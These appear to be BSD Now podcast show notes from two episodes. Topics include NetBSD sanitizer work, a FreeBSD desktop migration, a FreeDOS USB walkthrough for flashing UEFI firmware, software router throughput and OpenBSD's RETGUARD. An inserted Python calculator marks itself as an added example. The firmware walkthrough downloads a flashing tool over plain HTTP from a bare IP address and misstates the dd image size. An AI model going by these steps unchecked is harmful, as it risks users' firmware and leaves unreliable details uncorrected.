A prebuilt LLVM toolchain

I've prepared a prebuilt toolchain with Clang, LLVM, LLDB and compiler-rt for NetBSD/amd64.
I prepared the toolchain on 8.99.12; however, I have received reports that it works on other older releases.

Link: llvm-clang-compilerrt-lldb-7.0.0beta_2018-01-24.tar.bz2

The archive has to be untarred into /usr/local (however it might work to some extent in other paths). This toolchain contains a prebuilt tree of the LLVM projects from a snapshot of 7.0.0(svn). It is a pristine snapshot of HEAD with patches from pkgsrc-wip for llvm, clang, compiler-rt and lldb.

Sanitizers

Notable changes in sanitizers, all of them in the context of NetBSD support:
+ Added fstat(2) MSan interceptor.
+ Support for kvm(3) interceptors in the common sanitizer code.
+ Added devname(3) and devname_r(3) interceptors to the common sanitizer code.
+ Added sysctl(3) family of functions interceptors in the common sanitizer code.
+ Added strlcpy(3)/strlcat(3) interceptors in the common sanitizer code.
+ Added getgrouplist(3)/getgroupmembership(3) interceptors in the common sanitizer code.
+ Correct ctype(3) interceptors in code using Native Language Support.
+ Correct tzset(3) interceptor in MSan.
+ Correct localtime(3) interceptor in the common sanitizer code.
+ Added paccept(2) interceptor to the common sanitizer code.
+ Added access(2) and faccessat(2) interceptors to the common sanitizer code.
+ Added acct(2) interceptor to the common sanitizer code.
+ Added accept4(2) interceptor to the common sanitizer code.
+ Added fgetln(3) interceptor to the common sanitizer code.
+ Added interceptors for the pwcache(3)-style functions in the common sanitizer code.
+ Added interceptors for the getprotoent(3)-style functions in the common sanitizer code.
+ Added interceptors for the getnetent(3)-style functions in the common sanitizer code.
+ Added interceptors for the fts(3)-style functions in the common sanitizer code.
+ Added lstat(3) interceptor in MSan.
+ Added strftime(3) interceptor in the common sanitizer code.
+ Added strmode(3) interceptor in the common sanitizer code.
+ Added interceptors for the regex(3)-style functions in the common sanitizer code.
+ Disabled unwanted interceptor __sigsetjmp in TSan.

Base system changes

I've tidied up inclusion of the internal namespace.h header in libc. This has hidden the usage of public global symbol names of:
+ strlcat -> _strlcat
+ sysconf -> __sysconf
+ closedir -> _closedir
+ fparseln -> _fparseln
+ kill -> _kill
+ mkstemp -> _mkstemp
+ reallocarr -> _reallocarr
+ strcasecmp -> _strcasecmp
+ strncasecmp -> _strncasecmp
+ strptime -> _strptime
+ strtok_r -> _strtok_r
+ sysctl -> _sysctl
+ dlopen -> __dlopen
+ dlclose -> __dlclose
+ dlsym -> __dlsym
+ strlcpy -> _strlcpy
+ fdopen -> _fdopen
+ mmap -> _mmap
+ strdup -> _strdup

The purpose of these changes was to stop triggering interceptors recursively. Such interceptors lead to sanitization of the internals of unprepared (not recompiled with sanitizers) prebuilt code. It's not trivial to sanitize libc's internals and the sanitizers are not designed to do so. This means that they are not a full replacement of Valgrind-like software, but a supplement in the developer toolbox. Valgrind translates native code to a bytecode virtual machine, while sanitizers are designed to work with interceptors inside the pristine elementary libraries (libc, libm, librt, libpthread) and embed functionality into the executable's code.

I've also reverted the vadvise(2) syscall removal from the previous month. This caused a regression in legacy code recompiled against still supported compat layers. Newly compiled code will use libc's stub of vadvise(2).

I've also prepared a patch installing dedicated headers for sanitizers along with the base system GCC. It's still being discussed and should land in the sources soon.

Future directions and goals

Possible paths, in random order:
+ In the quartet of UBSan (Undefined Behavior Sanitizer), ASan (Address Sanitizer), TSan (Thread Sanitizer), MSan (Memory Sanitizer) we need to add the fifth basic sanitizer: LSan (Leak Sanitizer).
The Leak Sanitizer (detector of memory leaks) demands a stable ptrace(2) interface for processes with multiple threads (unless we want to build a custom kernel interface).
+ Integrate the sanitizers with the userland framework in order to ship with the native toolchain to users.
+ Port sanitizers from LLVM to GCC.
+ Allow sanitizing programs linked against userland libraries other than libc, librt, libm and libpthread, by a global option (like MKSANITIZER) producing a userland that is partially prebuilt with a desired sanitizer. This is required to run e.g. MSanitized programs against editline(3). So far, there is no Operating System distribution in existence with native integration with sanitizers. There are 3rd party scripts for certain OSes to build a stack of software dependencies in order to validate a piece of software.
+ Execute ATF tests with the userland rebuilt with supported flavors of sanitizers and catch regressions.
+ Finish porting of modern linkers designed for large C++ software, such as GNU GOLD and LLVM LLD. Today the bottleneck with building the LLVM toolchain is the suboptimal linker GNU ld(1).

I've decided to not open new battlefields and return now to porting LLDB and fixing ptrace(2).

Plan for the next milestone
+ Keep upstreaming a pile of local compiler-rt patches.
+ Restore the LLDB support for traced programs with a single thread.

Interview - Goran Mekic - meka@tilda.center (mailto:meka@tilda.center) / @meka_floss (https://twitter.com/meka_floss)
CBSD website (https://bsdstore.ru)
Jail and VM Manager

***

News Roundup

Finally Moving Away From Windows (https://www.manios.ca/blog/2018/01/finally-moving-away-from-windows/)

Broken Window

Thanks to a combination of some really impressive malware, bad clicking, and poor website choices, I had to blow away my Windows 10 installation. Not that it was Windows' fault, but a piece of malware had infected my computer when I tried to download a long lost driver for an even longer lost RAID card for a server.
A word of advice – the download you're looking for is never on an ad-infested forum in another language. In any case, I had been meaning to switch away from Windows soon. I didn't have my entire plan ready, but now was as good a time as any. My line of work requires me to maintain some form of Windows installation, so I decided to keep it in a VM rather than dual booting as I was developing code and not running any high-end visual stuff like games.

My first thought was to install Arch or Gentoo Linux, but the last time I attempted a Gentoo installation it left me bootless. Not that there is anything wrong with Gentoo, it was probably my fault, but I like the idea of some sort of installer so I looked at rock-solid Debian. My dad had installed Debian on his sweet new cutting-edge Lenovo laptop he received recently from work. He often raves about his cool scripts and much more effective customized experience, but often complains about his hybrid GPU support as he has an Intel/Nvidia hybrid display adapter (he has finally resolved it and now boasts his 6 connected displays).

I didn't want to install Windows again, but something didn't feel right about installing some flavour of Linux. Back at home I have a small collection of FreeBSD servers running in all sorts of jails and other physical hardware, with the exception of one Debian server which I had the hardest time dealing with (it would be FreeBSD too if 802.11ac support was there, as it is acting as my WiFi/gateway/IDS/IPS). I loved my FreeBSD servers, and yes I will write posts about each one soon enough. I wanted that cleanliness and familiarity on my desktop as well (I really love the ports collection!). It's settled – I will run FreeBSD on my laptop. This also created a new rivalry with my father, which is not a bad thing either.

Playing Devil's Advocate

The first thing I needed to do was back up my Windows data. This was easy enough, just run a Windows Image Backup and it will- wait, what?
Why isn't this working? I didn't want to fiddle with this too long because I didn't actually need an image, just the data. I ended up just copying over the files to an external hard disk. Once that was done, I downloaded and verified the latest FreeBSD 11.1 RELEASE memstick image and flashed it to my trusty 8GB Verbatim USB stick. I've had this thing since 2007; it works great for being my re-writable “CD”. I booted it up and started the installation. I knew this installer pretty well as I had test-installed FreeBSD and OpenBSD in VMs when I was researching a Unix style replacement OS last year. In any case, I left most of the defaults (I didn't want to play with custom kernels right now) and I selected all packages. This downloaded them from the FreeBSD FTP server as I only had the memstick image. The installer finished and I was off to my first boot.

Great! So far so good. FreeBSD loaded up and I did a 'pkg upgrade' just to make sure that everything was up to date. Alright, time to get down to business. I needed nano. I just can't use vi, or just not yet. I don't care about being a vi-wizard, that's just too much effort for me. Anyway, just a 'pkg install nano' and I had my editor.

Next was obvious, I needed x11. XFCE was common, and there were plenty of tutorials out there. I won't bore you with those details, but it went something like 'pkg install xfce' and I got all the dependencies. Don't forget to install SLiM to make it seamless. There are some configs in the .login I think. SLiM needs to be called once the boot drops you to the login so that you get SLiM's nice GUI login instead of the CLI login screen. Then SLiM passes you off to XFCE. I think I followed this and this.

Awesome. Now that x11 is working, it's time to get all of my apps from Windows. Obviously, I can't get everything (ie. Visual Studio, Office).
But in my Windows installation, I had chosen many open-source or cross-compiled apps as they either worked better or so that I was ready to move away from Windows at a moment's notice. 'pkg install firefox thunderbird hexchat pidgin gpa keepass owncloud-client transmission-qt5 veracrypt openvpn' were some immediate picks. There are a lot more that I downloaded later, but these are a few I use everyday. My laptop also has the same hybrid display adapter config that my dad's has, but I chose to only run Intel graphics, so dual screens are no problem for me. I'll add Nvidia support later, but it's not a priority.

After I had imported my private keys and loaded my firefox and thunderbird settings, I wanted to get my Windows VM running right away as I was burning productive days at work fiddling with this. I had only two virtualisation options: qemu/kvm and bhyve. qemu/kvm wasn't available in pkg, and looked real dirty to compile, from FreeBSD's point of view. My dad is using qemu/kvm with virt-manager to manage all of his Windows/Unix VMs alike. I wanted that experience, but I also wanted packages that could be updated and I didn't want to mess up a compile. bhyve was a better choice. It was built-in, it was more compatible with Windows (from what I read), and this is a great step-by-step article for Windows 10 on FreeBSD 11 bhyve! I had already tried to get virt-manager to work with bhyve with no luck. I don't think libvirt connects with bhyve completely, or maybe my config is wrong. But I didn't have time to fiddle with it. I managed it all through command lines and that has worked perfectly so far.

Well sorta, there was an issue installing SQL Server, and only SQL Server, on my Windows VM. This was due to a missing 'sectorsize=512' setting on the disk parameter on the bhyve command line. That was only found after A LOT of digging because the SQL Server install didn't log the error properly.
I eventually found out that SQL Server only likes one sector size of disks for the install and my virtual disk geometry was incorrect.

Apps Apps Apps

I installed Windows 10 on my bhyve VM and I got that all set up with the apps I needed for work. Mostly Office, Visual Studio, and vSphere for managing our server farm. Plus all of the annoying 3rd party VPN software (I'm looking at you Dell and Cisco). Alright, with the Windows VM done, I can now work at work and finish FreeBSD mostly during the nights.

I still needed my remote files (I set up an ownCloud instance on a FreeNAS jail at home) so I set up the client. Now, normally on Windows I would come to work and connect to my home network using OpenVPN (again, I have an OpenVPN FreeNAS jail at home) and the ownCloud desktop would be able to handle changing DNS destination IPs. Not on FreeBSD (and Linux too?). I ended up just configuring the ownCloud client to just connect to the home LAN IP for the ownCloud server and always connecting the OpenVPN to sync things. It kinda sucks, but at least it works. I left that running at home overnight to get a full sync (~130GB cloud sync, another reason I use it over Google or Microsoft).

Once that was done I moved onto the fstab as I had another 1TB SSD in my laptop with other files. I messed around with fstab and my NFS shares to my FreeNAS at home, but took them out as they made the boot time so long when I wasn't at home. I would only mount them when my OpenVPN connected or manually.

I really wanted to install SpaceFM, but it's only available as a package on Debian and their non-package install script doesn't work on FreeBSD (packages are named differently). I tried doing it manually, but it was too much work. As my dad was the one who introduced me to it, he still uses it as a use-case for his Debian setup. Instead I kept to the original PCManFM and it works just fine.
I also loaded up my Bitcoin and Litecoin wallets and pointed them to the blockchain that I had used on Windows; after their sync, they loaded perfectly and my balances were there. I kinda wish there was the Bitcoin-ABC full node Bitcoin Cash wallet package on FreeBSD, but I'm sure it will come out later.

The rest is essentially just tweaks and making the environment more comfortable for me, and with most programs installed as packages I feel a lot better with upgrades and audit checking ('pkg audit -F' is really helpful!). I will always hate Python, actually, I will always hate any app that has its own package manager. I do miss the GUI GitHub tool on Windows. It was a really good-looking way to view all of my repos. The last thing (which is increasing its priority every time I go to a social media site or YouTube) is fonts. My god, I never thought it was such a problem, and UTF support is complicated. If anyone knows how to get all UTF characters to show up, please let me know. I'd really like Wikipedia articles to load perfectly (I followed this post and there are still some missing). There are some extra tweaks I followed here and here.

Conclusion

I successfully migrated from Windows 10 to FreeBSD 11.1 with minimal consequence. Shout out goes to the entire FreeBSD community. So many helpful people in there, and the forums are a great place to find tons of information. Also thanks to the ones who wrote the how-to articles I've referenced. I never would have gotten bhyve to work and I'd still probably be messing with my X config without them. I guess my take home from this is to not be afraid to make changes that may change how comfortable I am in an environment. I'm always open to comments and questions, please feel free to make them below.
I purposefully didn't include too many technical things or commands in this article as I wanted to focus on the larger picture of the migration as a whole, not the struggles of xorg.conf, but if you would like to see some of the configs or commands I used, let me know and I'll include some!

TrueOS Rules of Conduct (https://www.trueos.org/rulesofconduct/)

We believe code is truly agnostic and embrace inclusiveness regardless of a person's individual beliefs. As such we only ask the following when participating in TrueOS public events and digital forums:
+ Treat each other with respect and professionalism.
+ Leave personal and TrueOS-unrelated conversations to other channels.
In other words, it's all about the code. Users who feel the above rules have been violated in some way can register a complaint with abuse@trueos.org

+ Shorter than the BSD License (https://twitter.com/trueos/status/965994363070353413)
+ Positive response from the community (https://twitter.com/freebsdbytes/status/966567686015782912): I really like the @TrueOS Code of Conduct, unlike some other CoCs. It's short, clear and covers everything. Most #OpenSource projects are a labour of love. Why do you need something that reads like a legal contract?

FreeBSD: The Unknown Giant (https://neomoevius.tumblr.com/post/171108458234/freebsd-the-unknown-giant)

I decided to write this article out of gratitude for the recent fast answer of the FreeBSD/TrueOS community to my questions and doubts. I am impressed by how fast they answered and how they tried to help me with this operating system, which I used in the past (2000-2007) but recently, in 2017, began to use again.

+ A lot has changed in 10 years

I was looking around the internet, trying to do some research about recent information on FreeBSD and other versions or easy-to-use spins like PCBSD (now TrueOS). I used to be a Windows/Mac user for so many years until 2014, when I decided to use Linux as my desktop OS just because I wanted to use something different.
I always wanted to use unix or a unix-like operating system; nowadays my main objective is to learn more about these operating systems (Debian Linux, TrueOS or FreeBSD). “FreeBSD has similarities with Linux, with two major differences in scope and licensing: FreeBSD maintains a complete operating system, i.e. the project delivers kernel, device drivers, userland utilities and documentation, as opposed to Linux delivering a kernel and drivers only and relying on third-parties for system software; and FreeBSD source code is generally released under a permissive BSD license as opposed to the copyleft GPL used by Linux.” But why do I call FreeBSD “The Unknown Giant”? Because the code base of this operating system has been used by other companies to develop their own operating system for products like computers or also game consoles.

+ FreeBSD is used for storage appliances, firewalls, email scanners, network scanners, network security appliances, load balancers, video servers, and more

So many people now will learn that not only “linux is everywhere” but also that “FreeBSD is everywhere too”. By the way, speaking about movies, do you remember the movie “The Matrix”? FreeBSD was used to make the movie: “The photo-realistic surroundings generated by this method were incorporated into the bullet time scene, and linear interpolation filled in any gaps of the still images to produce a fluent dynamic motion; the computer-generated “lead in” and “lead out” slides were filled in between frames in sequence to get an illusion of orbiting the scene.
Manex Visual Effects used a cluster farm running the Unix-like operating system FreeBSD to render many of the film's visual effects”

+ FreeBSD Press Release re: The Matrix (https://www.freebsd.org/news/press-rel-1.html)

I hope that I gave a good reference and information, and now so many people can understand why I am going to use just Debian Linux and FreeBSD (TrueOS) to do so many different things (music, 3D animation, video editing and text editing) instead of using a Mac or Windows.

+ FreeBSD really is the unknown giant.

OpenBSD and FreeDOS vs the hell in earth (https://steemit.com/openbsd/@npna/openbsd-and-freedos-vs-the-hell-in-earth)

Yes sir, yes. Our family, composed until now of OpenBSD, Alpine Linux and Docker, is rapidly growing. And yes, sir. Yes. All together we're fighting against your best friends, the infamous, the ugliest, the worst... the dudes called the privacy cannibals. Do you know what I mean, sure? We're working hard, no matter what time it is, no matter in what part of the world we are, no matter if we've no money. We perfectly know that you cannot do anything against the truth. And we're doing our best to expand our truth; our doors are open to all the good guys, there are a lot here but their brains were fucked by your shit TV, your fake news, your laws, etc etc etc. We're alive, we're here to fight against you. Tonight, yes, it's a Friday night and we're working, we're ready to welcome with open arms an old guy; his experience will give us more power.

Welcome to: FreeDOS

But why do we want to build a bootable USB stick with FreeDOS under our strong OpenBSD? The answer is, as usual, to fight against the privacy cannibals! More than one decade ago the old BIOS was silently replaced by the more capable and advanced UEFI; this is absolutely normal because of the passing of the years and the exponential growth of the power of our personal computers.
UEFI is a complex system; it's like a standalone operating system with direct access to every component of our (yes, it's ours, not yours!) machine. But... wait a moment... do you know how to use it? Did you even know that it exists? And one more thing: is it secure? The answer to this question is totally insane: no, it's not secure. The idea is good; the company that started it is, in theory, one of the most important in IT, Intel. The history is very long and obviously we're going to go very deep into it, but trust me, UEFI and its various friends, like ME and TPM, are insecure and closed source! Like the hell in earth.

A FreeDOS bootable usb image under OpenBSD

But let's start preparing our OpenBSD to put order in this chaos:

$ mkdir -p freedos/stuff
$ cd freedos/stuff
$ wget https://www.ibiblio.org/pub/micro/pc-stuff/freedos/files/distributions/1.0/fdboot.img
$ wget https://www.ibiblio.org/pub/micro/pc-stuff/freedos/files/dos/sys/sys-freedos-linux/sys-freedos-linux.zip
$ wget https://download.lenovo.com/consumer/desktop/o35jy19usa_y900.exe
$ wget http://145.130.102.57/domoticx/software/amiflasher/AFUDOS%20Flasher%205.05.04.7z

Explanation in clear language as usual: create two directories, download the minimal boot disc image of FreeDOS, download the Syslinux assembler MBR bootloaders, download the last Windows-only UEFI update from Lenovo and download the relatively unknown utility from AMI to flash our motherboard UEFI chipset. Go ahead:

$ doas pkg_add -U nasm unzip dosfstools cabextract p7zip

+ nasm: the Netwide Assembler, a portable 80x86 assembler.
+ unzip: list, test and extract compressed files in a ZIP archive.
+ dosfstools: a collection of utilities to manipulate MS-DOS filesystems.
+ cabextract: program to extract files from cabinet archives.
+ p7zip: collection of utilities to manipulate 7zip archives.
$ mkdir sys-freedos-linux && cd sys-freedos-linux
$ unzip ../sys-freedos-linux.zip
$ cd ~/freedos && mkdir old new
$ dd if=/dev/null of=freedos.img bs=1024 seek=20480
$ mkfs.fat freedos.img

Create another working directory, cd into it, unzip the archive that we've downloaded, return to the working root and create two more directories. dd is one of the most important utilities in the unix world to manipulate input and output at byte level: "The dd utility copies the standard input to the standard output, applying any specified conversions. Input data is read and written in 512-byte blocks. If input reads are short, input from multiple reads are aggregated to form the output block. When finished, dd displays the number of complete and partial input and output blocks and truncated input records to the standard error output." We're creating here a virtual disk: with bs=1024 we're setting both input and output block to 1024 bytes; with seek=20480 we require 20480 bytes. This is the result:

-rw-r--r-- 1 taglio taglio 20971520 Feb 3 00:11 freedos.img

Next we format the virtual disk using the MS-DOS filesystem. Go ahead:

$ doas su
$ perl stuff/sys-freedos-linux/sys-freedos.pl --disk=freedos.img
$ vnconfig vnd0 stuff/fdboot.img
$ vnconfig vnd1 freedos.img
$ mount -t msdos /dev/vnd0c old/
$ mount -t msdos /dev/vnd1c new/

We use the perl utility from syslinux to write the MBR of our virtual disk freedos.img. Next we create two loop virtual nodes using the OpenBSD utility vnconfig. Take care here because it is quite different from Linux, but as usual it is clear and simple. The virtual nodes are associated with the downloaded fdboot.img and the newly created freedos.img. Next we mount the two virtual nodes' c partitions; in OpenBSD the c partition describes the entire physical disk. Quite different from Linux, take care.
$ cp -R old/* new/
$ cd stuff
$ mkdir o35jy19usa
$ cabextract -d o35jy19usa o35jy19usa_y900.exe
$ doas su
$ cp -R o35jy19usa/ ../new/
$ mkdir afudos && cd afudos
$ 7z e ../AFUDOS*
$ doas su
$ cp AFUDOS.exe ../../new/
$ umount ~/freedos/old/ && umount ~/freedos/new/
$ vnconfig -u vnd1 && vnconfig -u vnd0

Copy all files and directories into the new virtual node partition, extract the Lenovo cabinet in a new directory, copy the result into our new image, extract the afudos utility and, like the others, copy it. Unmount the partitions and destroy the loop vnodes.

Beastie Bits
+ NetBSD - A modern operating system for your retro battlestation (https://www.geeklan.co.uk/files/fosdem2018-retro)
+ FOSDEM OS distribution (https://twitter.com/pvaneynd/status/960181163578019840/photo/1)
+ Update on two pledge-related changes (https://marc.info/?l=openbsd-tech&m=151268831628549)
+ *execpromises (https://marc.info/?l=openbsd-cvs&m=151304116010721&w=2)
+ Slides for (BSD from scratch - from source to OS with ease on NetBSD) (https://www.geeklan.co.uk/files/fosdem2018-bsd/)
+ Goodbye LastPass: You're fired! (https://blog.crashed.org/goodbye-lastpass/)

***

Feedback/Questions
+ Scott - ZFS Mirror with SLOG (http://dpaste.com/22Z8C6Z#wrap)
+ Troels - Question about compressed ARC (http://dpaste.com/3X2R1BV#wrap)
+ Jeff - FreeBSD Desktop DNS (http://dpaste.com/2BQ9HFB#wrap)
+ Jonathon - Bhyve and gpu passthrough (http://dpaste.com/0TTT0DB#wrap)

***

BSD Now
211: It's HAMMER2 Time!

Sep 13, 2017, 122:42


We explore whether a BSD can replicate Cisco router performance; RETGUARD, OpenBSD's new exploit mitigation technology; Dragonfly's HAMMER2 filesystem implementation & more!

This episode was brought to you by

Headlines

Can a BSD system replicate the performance of a Cisco router? (https://www.reddit.com/r/networking/comments/6upchy/can_a_bsd_system_replicate_the_performance_of/)

Short Answer: No, but it might be good enough for what you need

Traditionally routers were built with a tightly coupled data plane and control plane. Back in the 80s and 90s the data plane was running in software on commodity CPUs with proprietary software. As the needs and desires for more speeds and feeds grew, the data plane had to be implemented in ASICs and FPGAs with custom memories and TCAMs. While these were still programmable in a sense, they certainly weren't programmable by anyone but a small handful of people who developed the hardware platform. The data plane was often layered, where features not handled by the hardware data plane were punted to a software-only data path running on a more general CPU. The performance difference between the two was typically an order or two of magnitude. source (https://fd.io/wp-content/uploads/sites/34/2017/07/FDioVPPwhitepaperJuly2017.pdf)

Except for encryption (e.g. IPsec) or IDS/IPS, the true measure of router performance is packets forwarded per unit time. This is normally expressed as packets per second, or PPS. To 'line-rate' forward on a 1Gbps interface, you must be able to forward packets at 1.488 million pps (Mpps). To forward at "line-rate" between 10Gbps interfaces, you must be able to forward at 14.88Mpps. Even on large hardware, kernel forwarding is limited to speeds that top out below 2Mpps. George Neville-Neil and I did a couple of papers on this back in 2014/2015. You can read the papers (https://github.com/freebsd-net/netperf/blob/master/Documentation/Papers/ABSDCon2015Paper.pdf) for the results.
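The line-rate figures quoted in that answer (1.488 Mpps for 1 Gbps, 14.88 Mpps for 10 Gbps, and the 67.2 ns per-packet budget at 10 Gbps that the thread derives from it) follow from one calculation. The block below is an added example, not code from the Reddit thread or from any project it mentions; it generalises the calculation to any link speed and frame size, so the same functions answer "how many pps do I need for 40 or 100 GbE?" and "does one DRAM access fit in the budget?". The 20-byte per-frame wire overhead (7-byte preamble, 1-byte start-of-frame delimiter, 12-byte inter-frame gap) is the standard Ethernet figure, and the 70 ns DRAM latency is the number the thread cites, used here as a constructed reference value rather than a measurement; all function and constant names are my own.

```python
"""Line-rate forwarding budget calculator (added example, not from the thread)."""
from dataclasses import dataclass

# Bytes that surround every Ethernet frame on the wire but are not part of the
# frame itself: 7-byte preamble + 1-byte SFD + 12-byte inter-frame gap.
# The 4-byte FCS is already inside the 64-byte minimum frame, so it is not added.
WIRE_OVERHEAD_BYTES = 7 + 1 + 12

# Constructed reference value: the DRAM access latency the thread cites, in ns.
DRAM_LATENCY_NS = 70.0


@dataclass(frozen=True)
class PacketBudget:
    link_bps: float        # link speed in bits per second
    frame_bytes: int       # frame size the calculation assumes
    pps: float             # packets per second needed to saturate the link
    ns_per_packet: float   # wall-clock time available per packet (Rx + process + Tx)


def line_rate_pps(link_bps: float, frame_bytes: int = 64) -> float:
    """Packets per second required to fill a link with frames of this size."""
    bits_per_frame_on_wire = (frame_bytes + WIRE_OVERHEAD_BYTES) * 8
    return link_bps / bits_per_frame_on_wire


def packet_budget(link_bps: float, frame_bytes: int = 64) -> PacketBudget:
    """Line-rate PPS plus the per-packet time budget that implies."""
    pps = line_rate_pps(link_bps, frame_bytes)
    return PacketBudget(link_bps, frame_bytes, pps, 1e9 / pps)


def fits_in_budget(budget: PacketBudget, cost_ns: float) -> bool:
    """True if a per-packet cost (e.g. one DRAM access) fits inside the budget."""
    return cost_ns <= budget.ns_per_packet


def link_saturated_gbps(max_pps: float, frame_bytes: int = 64) -> float:
    """Fastest link a forwarder capped at max_pps can fill with this frame size."""
    return max_pps * (frame_bytes + WIRE_OVERHEAD_BYTES) * 8 / 1e9


def budget_table(link_gbps_list=(1, 10, 40, 100), frame_bytes: int = 64):
    """Rows of (Gbps, Mpps, ns per packet, one DRAM access fits?) per link speed."""
    rows = []
    for gbps in link_gbps_list:
        b = packet_budget(gbps * 1e9, frame_bytes)
        rows.append((gbps, b.pps / 1e6, b.ns_per_packet,
                     fits_in_budget(b, DRAM_LATENCY_NS)))
    return rows


if __name__ == "__main__":
    print(f"{'Gbps':>5} {'Mpps':>9} {'ns/pkt':>8}  one DRAM access fits?")
    for gbps, mpps, ns, fits in budget_table():
        print(f"{gbps:>5} {mpps:>9.3f} {ns:>8.1f}  {'yes' if fits else 'no'}")
    # A kernel path that tops out at 2 Mpps covers 1 GbE (1.488 Mpps needed)
    # but cannot fill anything faster than about 1.3 Gbps with 64-byte frames.
    print(f"2 Mpps of 64-byte frames saturates at most "
          f"{link_saturated_gbps(2e6):.3f} Gbps")
```

Minimum-size frames are the worst case for a forwarder, which is why routers are benchmarked at 64 bytes; the same functions with frame_bytes=1500 show why a "10 Gbps" figure measured with large frames says little about pps capacity.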
However, once you export the code from the kernel, things start to improve. There are a few open source code bases that show the potential of kernel-bypass networking for building a software-based router.

The first of these is netmap-fwd (https://github.com/Netgate/netmap-fwd), which is the FreeBSD ip_forward() code hosted on top of netmap (https://github.com/luigirizzo/netmap), a kernel-bypass technology present in FreeBSD (and available for Linux). Full disclosure: netmap-fwd was done at my company, Netgate. (And by "my company" I mean that I co-own it with my spouse.) netmap-fwd will L3 forward around 5 Mpps per core. slides (https://github.com/Netgate/netmap-fwd/blob/master/netmap-fwd.pdf)

Nanako Momiyama of the Keio Univ Tokuda Lab presented on IP Forwarding Fastpath (https://www.bsdcan.org/2017/schedule/events/823.en.html) at BSDCan this past May. She got about 5.6Mpps (roughly 10% faster than netmap-fwd) using a similar approach where the ip_forward() function was rewritten as a module for VALE (the netmap-based in-kernel switch). Slides (https://2016.eurobsdcon.org/PresentationSlides/NanakoMomiyama_TowardsFastIPForwarding.pdf) from her previous talk at EuroBSDCon 2016 are available. (Speed at the time was 2.8Mpps.) Also a paper (https://www.ht.sfc.keio.ac.jp/~nanako/conext17-sw.pdf) from that effort, if you want to read it. Of note: they were showing around 1.6Mpps even after replacing the in-kernel routing lookup algorithm with DXR. (DXR was written by Luigi Rizzo, who is also the primary author of netmap.)
Not too long after netmap-fwd was open sourced, Gandi announced packet-journey, an application based on drivers and libraries from DPDK. Packet-journey is also an L3 router. The GitHub page for packet-journey lists performance as 21,773.47 mbps (so 21.77Gbps) for 64-byte UDP frames with 50 ACLs and 500,000 routes. Since they're using 64-byte frames, this translates to roughly 32.4Mpps.

Finally, there is recent work in FreeBSD (which is part of 11.1-RELEASE) that gets performance up to 2x the level of netmap-fwd or the work by Nanako Momiyama. 10 million PPS: Here (http://blog.cochard.me/2015/09/receipt-for-building-10mpps-freebsd.html) is a decent introduction.

But of course, even as FreeBSD gets up to being able to do 10gbps at line-rate, 40 and 100 gigabits are not uncommon now. Even with the fastest modern CPUs, this is very little time to do any kind of meaningful packet processing. At 10Gbps, your total budget per packet, to receive (Rx) the packet, process the packet, and transmit (Tx) the packet, is 67.2 ns. Complicating the task is the simple fact that main memory (RAM) is 70 ns away. The simple conclusion here is that, even at 10Gbps, if you have to hit RAM, you can't generate the PPS required for line-rate forwarding.

There is some detail about design tradeoffs in the Ryzen architecture and how that might impact using those machines as routers.

Anyway... those are all interesting, but the natural winner here is FD.io's Vector Packet Processing (VPP). Read this (http://blogs.cisco.com/sp/a-bigger-helping-of-internet-please)

VPP is an efficient, flexible open source data plane. It consists of a set of forwarding nodes arranged in a directed graph and a supporting framework. The framework has all the basic data structures, timers, drivers (and interfaces to both DPDK and netmap), a scheduler which allocates the CPU time between the graph nodes, and performance and debugging tools, like counters and built-in packet trace.
The latter allows you to capture the paths taken by the packets within the graph with high timestamp granularity, giving full insight into the processing on a per-packet level.

The net result here is that Cisco (again, Cisco) has shown the ability to route packets at 1 Tb/s using VPP on a four socket Purley system.

There is also much discussion of the future of pfSense, as they transition to using VPP.

This is a very lengthy write up which deserves a full read, plus there are some comments from other people.

***

RETGUARD, the OpenBSD next level in exploit mitigation, is about to debut (https://marc.info/?l=openbsd-tech&m=150317547021396&w=2)

This year I went to BSDCAN in Ottawa. I spent much of it in the 'hallway track', and had an extended conversation with various people regarding our existing security mitigations and hopes for new ones in the future. I spoke a lot with Todd Mortimer. Apparently I told him that I felt return-address protection was impossible, so a few weeks later he sent a clang diff to address that issue...

The first diff is for amd64 and i386 only -- in theory RISC architectures can follow this approach soon.

The mechanism is like a userland 'stackghost' in the function prologue and epilogue. The preamble XOR's the return address at top of stack with the stack pointer value itself. This perturbs by introducing bits from ASLR. The function epilogue undoes the transform immediately before the RET instruction. ROP attack methods are impacted because existing gadgets are transformed to consist of " RET". That pivots the return sequence off the ROP chain in a highly unpredictable and inconvenient fashion.

The compiler diff handles this for all the C code, but the assembly functions have to be done by hand. I did this work first for amd64, and more recently for i386. I've fixed most of the functions and only a handful of complex ones remain.
For those who know about polymorphism and pop/jmp or JOP, we believe once standard-RET is solved those concerns become easier to address separately in the future. In any case a substantial reduction of gadgets is powerful.

For those worried about introducing worse polymorphism with these "xor; ret" epilogues themselves, the nested gadgets for 64bit and 32bit variations are +1 "xor %esp,(%rsp); ret", +2 "and $0x24,%al; ret" and +3 "and $0xc3,%al; int3". Not bad.

Over the last two weeks, we have received help and advice to ensure debuggers (gdb, egdb, ddb, lldb) can still handle these transformed callframes. Also in the kernel, we discovered we must use a smaller XOR, because otherwise userland addresses are generated, and cannot rely on SMEP as it is a really new feature of the architecture. There were also issues with pthreads and dlsym, which leads to a series of uplifts around __builtin_return_address and DWARF CFI.

Application of this diff doesn't require anything special, a system can simply be built twice. Or shortcut by building & installing gnu/usr.bin/clang first, then a full build.

We are at the point where userland and base are fully working without regressions, and the remaining impacts are in a few larger ports which directly access the return address (for a variety of reasons). So work needs to continue with handling the RET-addr swizzle in those ports, and then we can move forward.

You can find the full message with the diff here (https://marc.info/?l=openbsd-tech&m=150317547021396&w=2)

***

Interview - Ed Maste, Charlie & Siva - @ed_maste (https://twitter.com/ed_maste), @yzgyyang (https://twitter.com/yzgyyang) & @svmhdvn (https://twitter.com/svmhdvn)

Co-op Students for the FreeBSD Foundation

***

News Roundup

Next DFly release will have an initial HAMMER2 implementation (http://lists.dragonflybsd.org/pipermail/users/2017-August/313558.html)

The next DragonFly release (probably in September some time) will have an initial HAMMER2 implementation.
It WILL be considered experimental and won't be an installer option yet. This initial release will only have single-image support operational plus basic features. It will have live dedup (for cp's), compression, fast recovery, snapshot, and boot support out of the gate.

This first H2 release will not have clustering or multi-volume support, so don't expect those features to work. I may be able to get bulk dedup and basic mirroring operational by release time, but it won't be very efficient. Also, right now, sync operations are fairly expensive and will stall modifying operations to some degree during the flush, and there is no reblocking (yet). The allocator has a 16KB granularity (on HAMMER1 it was 2MB), so for testing purposes it will still work fairly well even without reblocking.

